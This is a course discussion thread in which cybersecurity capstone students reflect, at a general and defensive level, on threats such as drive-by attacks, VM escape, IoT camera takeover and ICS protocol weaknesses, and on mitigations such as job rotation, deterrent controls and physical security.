During this last week of Discussion Questions, I would ask that you reflect that you consider at least one of the following:
- Which security threats did you become aware of during this capstone class? How would you mitigate against this threat?
- What mitigation methods did you become aware of for the first time during this capstone class? Why is that mitigation method unique, more efficient or effective, or otherwise significant?
Dima Dabbas says
Which security threats did you become aware of during this capstone class? How would you mitigate against this threat?
I think one of the security threats that I became more aware of from this is class is the disposal of old hardware. I wasn’t aware of how complex this process is and how there really isn’t any guarantee to ensure that all the data has been wiped out for good from the hard drives. It seems like the only way to be safe that the hard drives do no contain any confidential data is to destroy the hard drives. The idea of role access and the least privilege principal is a topic I was aware of but I think this class expanded more on the significance of role access and how it can impact the security of an organization. During this class, we learned the concepts of separation of duties, having employees learn each other’s duties and switch from time to time. This helps in auditing purposes as well an ensuring there are backups in case an employee is on vacation or out sick.
What mitigation methods did you become aware of for the first time during this capstone class? Why is that mitigation method unique, more efficient or effective, or otherwise significant?
The various policies that exist within an organization help mitigate the cyber risks and threats. The regulatory policies that exist help an organization protect its data and be compliant with the regulations. All the policies within an organization should be reviewed regularly and tested to ensure that all the vulnerabilities and threats are controlled to an acceptable level. The BCP and DRP plans are also mitigation methods as they help an organization resume its business operations in a reasonable time period. All the plans within an organization need to be updated after major updates and patches which will help in ensuring that all risks and threats are mitigated.
Elizabeth V Calise says
Dima – I am with you on that. Until I looked at some documents to explained the process of disposing hardware, I did not realize how indepth the process was. Especially when if it contained sensitive/classified data. As you mentioned, it is not 100% guaranteed that the harddrive is cleaned of any and all data. The safest method when it comes to the that has classified or sensitive data is to destroy it.
Jonathan Duani says
Dima,
I definitely agree with what you and Elizabeth have to say. It is crazy to think how extensive the decommissioning of storage media can be. You don’t think that after you delete something it is still there but in reality a lot of time all the data is completely recoverable. If really goes to show it is a good idea to take a couple extra steps to be sure problems don’t arise after the fact
Brock Donnelly says
Drive-by attacks is a threat that I am now aware of due to this capstone class. While I was mildly aware of its possibilities, this class lifted the veil to Drive-by attacks. A drive-by attack is a way of distributing malware to unsuspecting victims through insecure websites. Attackers plant malicious scripts into PHP or HTTP pages. Visitors of these pages then silently become infected assuming their computers are vulnerable to said malware.
This threat is most interesting to me because it is so devious. Modifying the code of a website is only the first step on the hackers’ agenda. Infecting the user’s machine isn’t even the end goal. The attacker hopes to gain control of a computer on a network of much higher profile target. Besides people data is an organization most valuable asset. An organization such as a financial institution, an establishment holding PII, or any proprietary data is what this hacker seeks. Following the attack would likely be ransoms of the sale of important data.
Mitigations for such a threat is multifaceted. Securing websites with high enough traffic to be a target should be the concern of every developer. Simply using best practices or free scanning tools should be second only to system patching. All consumers should patch their systems and have updated malware definitions. Organizations should have their user terminals patched and protected from malware. IDSs and IPSs, as well as Firewalls, should be in place. Sufficient policies and procedures should be placed to ensure personnel and system privileges are separated with complexity so that a singular compromise does not result in a single point of failure.
Dima Dabbas says
Brock,
Drive by attacks are indeed very sneaky attacks as you had mentioned victims of these attacks aren’t even aware that their computers have been infected by malware. It is slowly after noticing abnormal behavior do they notice that their computers have been infected by malware. There is no true easy way to protect against these type of attacks besides ensuring that the systems are always patched and that that systems are protected from the most-recent malware.
Jonathan Duani says
I think the reason that drive by attacks are so bad that if takes so much work to set up and it’s so premeditated in that there are so many different levels to it like you mentioned where not only is the point to infect but also gain control at some point it really is does make this attack so bad when it happens
Ahmed A. Alkaysi says
What mitigation methods did you become aware of for the first time during this capstone class? Why is that mitigation method unique, more efficient or effective, or otherwise significant?
I wasn’t really aware of deterrent or recovery controls before this class. I always new the big three: preventive, corrective, and detective. I think that although deterrent controls might not require a ton of investment, they can be pretty efficient to deter potential threats. For example, lets say you are speeding driving down a road and see as sign saying there are speed cameras in the area, you would most likely start slowing down and driving around the speed limit. With just the cost of the sign itself, assuming that there are indeed no speed cameras, a control was implemented to reduce speeding drivers. Deterrent controls can also be used for physical security. Instead of using real cameras everywhere, an organization can employ dud cameras displayed in obvious locations to deter a potential bad-actor from committing crimes.
Oby Okereke says
Hi Ahmed,
And you are absolutely right, the use of dud cameras is quite common in many organizations. Though many claims exists to support its claim to deter crime, empirical evidence does not prove the same for the most part. A determined burglar or potential perpetrators will still commit crime but for an everyday employee…they may have to think twice not knowing exactly if they are been taped.
Dima Dabbas says
Ahmed,
I had heard of deterrent controls before but did not actually know what they were. This class made me understand what these controls are and what impact they can have on organizations. As you mentioned, deterrent controls are important as they may make the attackers second think before they commit their crime. Your example explains that clearly and signifies why organizations should consider deterrent controls.
Frederic D Rohrer says
Which security threats did you become aware of during this capstone class? How would you mitigate against this threat?
I became aware of many of the physical security threats during this class. I did not consider physical security as an important domain in the CISSP framework before. However now I see that physical security is the first step to a complete Cyber Security program. Facilities, datacenters and servers are the most essential to protect, without these there would be no application or database to hack into. Physical weaknesses are just as plenty and easy to abuse as digital ones. I know now that mitigation to these threats can be as easy as picking the right location for your facility. Also, having biometric scanning devices and man-traps at door did not occur to me, at least not in the context of data center security. I watched numerous presentations about physical security outside of class which gave me some insight on how easy it is to “hack” elevators, doors, card readers and locks. Just being aware of the fallacies of these all can aid in a secure data center design.
What mitigation methods did you become aware of for the first time during this capstone class? Why is that mitigation method unique, more efficient or effective, or otherwise significant?
I find the idea of job rotation a very interesting one. In Domain 7 – Security Operations, we discussed the fact that employees can be malicious or incompetent and it will never be found out because they always perform the same task. This can be mitigated by rotation the person out of their role during a job critical task, in order to see whether the action is performed normally or if there are discrepancies.
Oby Okereke says
Hi Fred:
I have to chime in on your comment per physical security threats. Over time, I’ve come to know the importance of securing a business premise per fraud prevention and theft for the most part but taking this capstone class has opened my mind’s eye to a lot more.
I particularly came to learn about CPTED. – crime prevention through environmental design. I heard that term for the first time during this capstone class.
Having waded through a series of articles in the course of the capstone class, it all makes sense why a poorly designed business environment is not only a threat and danger to the individuals or employees who report to the business on a daily basis but also the survival of the business hinges greatly on CPTED in case of an occurrence of a natural disaster or even a hostage situation.
The importance of resource protection and people is all so important for business continuity and as a security professional, I would think and expect this to be at the forefront of every business continuity strategy and planning.
Elizabeth V Calise says
Fred – physical security is defintely something all should take seriously and it should be a priority. I can say I recently learned this a couple months ago after talking to a few collegues. You mentioned even picking the location is important. When you think about US companies going international – they have to pick their locations wisley especially company contractors. It is a lenghty process just to find the right location and if checks all the required boxes. You have to include politics as well. A us governement contractor who is looking for a location in Denmark is not going to choose a building that is right next to a sensitive russian based company. There is so much that goes into physical aspect.
Jonathan Duani says
Fred
It is a really good point and I do agree with you that I did not think physical security was part of an IT security course but it does make sense. There is a whole different level to physicalsecurity because not only are there threats in the cyber realm where people try to gain access remotely but there is also threats to the physicial hardware that everything is running on. This makes the needs to have controls in place to physical lock down the locations of servers so important
Oby Okereke says
Which security threats did you become aware of during this capstone class? How would you mitigate against this threat?
VM escape attack is one of the many security threats that I learned of during the capstone class. The trend to migrate to the cloud and the use of hypervisors in the cloud makes this attack even more dangerous because of the blurred responsibility lines associated with cloud service providers (CSP) and their customers.
I had to research a bit on this topic and even learned of specific vulnerabilities that have been successful on VM’s – various CVE’s exists that describe these vulnerabilities and below lies some of the mitigating controls that I would adopt to address VM escape attacks.
1. Discovery and inventory management – This will help to avoid VM’s from being neglected and this ties into the next point which is heavy monitoring.
2. Heavy monitoring – By monitoring the VM environments, any change in traffic or baseline use will trigger alerts for further investigations thereby catching any suspicious attacks or movements
3. Sandboxing – Sandboxing VM’s is particularly a good mitigating control that allows isolation to occur when testing applications before a full roll out occurs.
4. Advising customers to lean towards a private cloud whereby the sensitivity of data is very important.
5. Practicing defense in depth is the be-all mitigating control which will, in essence, create different layers of protective mechanism that will make it difficult for attackers to fully succeed in VM escapes as they will have to navigate many hoops in order to be successful
On a final note, good patch management, configuration, and change control management practices are equally mitigating controls that one should not neglect.
Duy Nguyen says
1. Which security threats did you become aware of during this capstone class? How would you mitigate against this threat?
2. What mitigation methods did you become aware of for the first time during this capstone class? Why is that mitigation method unique, more efficient or effective, or otherwise significant?
Based on our previous security classes, a lot of the main vulnerabilities and threats were cemented into our heads. One aspect that I had the opportunity of learning more about was the current incorporation of security into older lifecycle methodologies. As more and more breaches are reported, many organizations are slowly incorporating the security aspect into each level of their Software Development Lifecycle. This process is set up by adding security-related activities to the development process. There are various methodologies that have attempted to incorporate these activities such as MS Security Development Lifecycle (MS SDLC), NIST 800-64, and OWASP CLASP (Comprehensive, Lightweight Application Security Process).
Dima Dabbas says
Duy,
This class does highlight the importance of considering security in every phase of any project. In order to ensure that a new project incorporated security, it is essential to consider security from the beginning from the planning phase. This helps in not having to spend more money when things start to go wrong and you notice that the system was not well protected. In many of those cases, the system would need to be rebuilt which ends up costing the organization more personnel and financial resources.
Jonathan Duani says
I think one of the biggest security that I became aware of during class was crypto-physic hacking. This is when physical infastructue is hacked for malicious purposes. For example a power grid or water treatment plant. I think this is really interesting cause as people get better and better at hacking the space could change to fighting a cyber war instead of a physical war. And it is already happening. I think as time progresses we will see more and more wars are faught from home and attacking critical infastructue instead of boots on the ground. I think the best way to protect our infastructue from such attacks would be to first things first make sure all updates have been completed. All systems and end points are properly secured with correct physical security as well. It is important to make sure all the systems are actively monitored in the even of something happening. Finally if all else fails, for example it’s a super critical system on legacy piece of software that can not be updated I think the best course of action is to air gap the system and make sure nothing can get to it unless you are physically sitting at the console.
Elizabeth V Calise says
1. Which security threats did you become aware of during this capstone class? How would you mitigate against this threat?
I came across this security threat that I was not fully aware during one of the community site discussions and that would be mobile malware. Mobile devices are an increasing top attack target. It is a trend rooted in poor vulnerability management. Many organizations that try to deploy mobile device management solutions find privacy concerns limit adoption. A pain point that has been identified is the Android installed base. It has been shown that a vast majority of Android devices in the world are running on old versions of Android. So when you look at the motivations of a lot if IoT device manufacturers, it is challenging to get them to continue to support devices and get timely patches because then you are getting back to mobile issues.
To help mitigate against this threat, organizations should ensure employees access to an anti-malware solution. Even if it not managed by the organization, this will alleviate some security concerns.
Jonathan Duani says
Elizabeth,
Mobile malware is a really good one! I think it is becoming more and more known as the years so by and especially on Android phones are super annoying. A cell phone is basically a tiny computer at this point and people are starting to Target them. It’s crazy to think how much of your life is in your mobile device and if someone can gain access it is essentially just as bad or worse then gaining access to your computer. There is a good chance you have more personal information on your phone at this point.
Steve Pote says
…I posted these backwards…this is my ~news~…still works this way
From the NJ Cyber news letter there is a cryptic warning and a report on IoT being used as a pivot and in the case of cameras, devices being taken over and spoofed (imagine every bank robbery movie ever where they play the video of the empty vault while it is being robbed).
For anyone interested I have a PoC of both using Septa Rail in a class presentation from last Fall…
In most cases there is no good pat for what to do next. Web Cams ship with and are used with bad default passwords. They serve data using old unsecured (let alone encrypted) connections and for now we are the “happy it works” phase…Ok, It’s alive…What now Dr. Frankenstein?
More bad things will need to happen before secure transmissions and modest authentications and any form of secure coding are in place in IoT.
http://view.communications.cyber.nj.gov/?qs=aa5d4701c973ba8b484a55458c9a73612ff29e0a2394a64911ec90b5419980d5b1bee52bce94ccde7b7c3cd25149420297d8dad713d40c041e5613c69879ec4c64add076c9f98a69d1b24fcb409cd1f3
Sheena L. Thomas says
I have been in the industry for a few years now, so most of the threats discussed, I am familiar with. However, I am amazed at how the same threats that effected us years ago still exist today. Technology and the industry is forever changing but most of the threats are still the same. Sometimes if feels as if the attackers are one step ahead, but then again are we shooting our own self in the foot by not doing our due diligence as a company??. As I grow in this field i am looking forward constantly having to defend the data and privacy of end users.
I wish everyone the best as they grow in their careers!
Congratulations to all of the 2019 ITACS graduates!!!! We made it!!!
Jonathan Reid Kerr says
Which security threats did you become aware of during this capstone class? How would you mitigate against this threat?
There was one security threat that I cam across during my research for our group project, namely the threat that current power utility communication protocols (DNP3/Modbus/IEC) pose to power utility facilities and businesses. The lack of authentication and integrity checking can allow anyone who gains access to spoof alerts and messages, and even redirect traffic easily over the network.
One of the major issues is that Industrial Control System (ICS) security is a specialized field with few security professionals in it. This has slowed development of technologies to make up for the weaknesses in their communication protocols and has left many organizations without the expertise to defend from cyber attacks. In order to mitigate this threat, power utility companies should conduct a vulnerability analysis to assess and shut down various points of entry for an attacker. Access points should be limited and employees should undergo security awareness training/education. This will help with preventing exploitation of the protocols being used by keeping attackers out of the network. It is a small bandage on a much larger problem, one that needs far more time and effort before it can be fixed.